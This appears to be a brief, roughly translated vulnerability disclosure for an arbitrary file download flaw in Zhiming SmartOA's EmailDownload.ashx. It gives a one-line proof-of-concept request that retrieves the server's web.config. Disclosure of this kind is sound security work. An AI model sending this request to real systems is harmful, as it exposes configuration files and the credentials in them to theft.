Smartoa Emaildownload Ashx Arbitrary File Download Vulnerability
Smartoa Emaildownload Ashx Arbitrary File Download Vulnerability
SmartOA EmailDownload.ashx Arbitrary File Download Vulnerability
Vulnerability Description
Zhiming SmartOA EmailDownload.ashx file has any file download vulnerability. Through the vulnerability, you can download sensitive files on the server and view sensitive information.
Vulnerability Impact
SmartOA
Network surveying and mapping
Vulnerability reappears
Login page
Verify POC
1
/file/EmailDownload.ashx?url=~/web.config&name=web.config
This post is licensed under CC BY 4.0 by the author.